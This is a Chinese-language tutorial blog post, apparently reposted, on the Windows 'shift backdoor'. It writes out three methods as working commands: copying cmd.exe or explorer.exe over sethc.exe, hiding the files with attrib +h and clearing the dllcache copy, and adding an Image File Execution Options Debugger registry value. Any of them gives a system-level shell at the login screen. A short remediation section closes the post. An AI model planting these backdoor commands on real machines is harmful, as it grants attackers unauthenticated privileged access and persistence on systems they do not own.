參考：https://blog.csdn.net/qq_43626025/article/details/122031653
shift后門
替換C:\windows\system32\sethc.exe為你想要啟動的后門程序，這里替換為我們用最常見的cmd.exe。

這里要注意下，默認(rèn)情況下我們需要先改變sethc的所有者，然后修改用戶權(quán)限不然的話沒辦法操作。

執(zhí)行以下命令

Move C:\windows\system32\sethc.exeC:\windows\system32\sethc.exe.bak
Copy C:\windows\system32\cmd.exeC:\windows\system32\sethc.exe

然后回到系統(tǒng)登錄界面，連續(xù)按5次shift，調(diào)用cmd

一、如何制作shift后門
方法1
在cmd窗口，敲打命令如下：

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

attrib c:\windows\system32\sethc.exe +h

attrib c:\windows\system32\dllcache\sethc.exe +h

用copy命令將explorer.exe復(fù)制為setch.exe，這樣在登陸界面下連續(xù)按5次shift就可以調(diào)出程序管理系統(tǒng)了，就獲取了系統(tǒng)權(quán)限。

(也可以將explorer.exe 改為cmd.exe，這樣子這樣在登陸界面下連續(xù)按5次shift就可以調(diào)出cmd命令了，就獲取了shell權(quán)限。)

方法2
將 C:\WINDOWS\system32\dllcache\sethc.exe刪除，這個文件夾中放著緩存，如果不刪除就會自動變回去

找到 C:\WINDOWS\system32\cmd.exe 將其復(fù)制并將名稱更改為 sethc.exe，放回文件夾中

方法3
REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”

命令說明：reg add 是向注冊表添加記錄，后面跟的是注冊表的位置，這里需要注意的是 HKLM 實際上是 HKEY_LOCAL_MACHINE 的縮寫。Image File Execution Option 這個目錄就是用來設(shè)置鏡像劫持的，要被劫持的就是命令中的 sethc 粘滯鍵程序，隨后通過 / v 來指定鍵名，這個鍵名 debugger 是固定的，然后通過 / t 來指定類型，即 REG_SZ 字符串類型，最后通過 / d 來指定鍵的值，即被惡意替換的程序，也就是我們的 cmd

修復(fù)方法
1，運(yùn)行“regedit”打開注冊表

2，切換該位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

如果該目錄下不存在sethc.exe項：

對著Image File Execution 右鍵 新建項 里面輸入sethc.exe

對著新創(chuàng)建的sethc.exe右健，新建，字符串值，Debugger

雙擊新建的Debugger,在數(shù)值數(shù)據(jù)中填入afafagagag一些你胡亂打的數(shù)值

置完后最好設(shè)置下權(quán)限,Everyone 禁止 刪除 禁止 設(shè)置項值

如果目錄下存在sethc.exe項：

打開sethc.exe項 右面雙擊 Debugger 里面的內(nèi)容改成afagagagag之類的（亂打就行),這樣就免疫并且清除了 shift后門.

總結(jié)

以上是生活随笔為你收集整理的shift后门的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。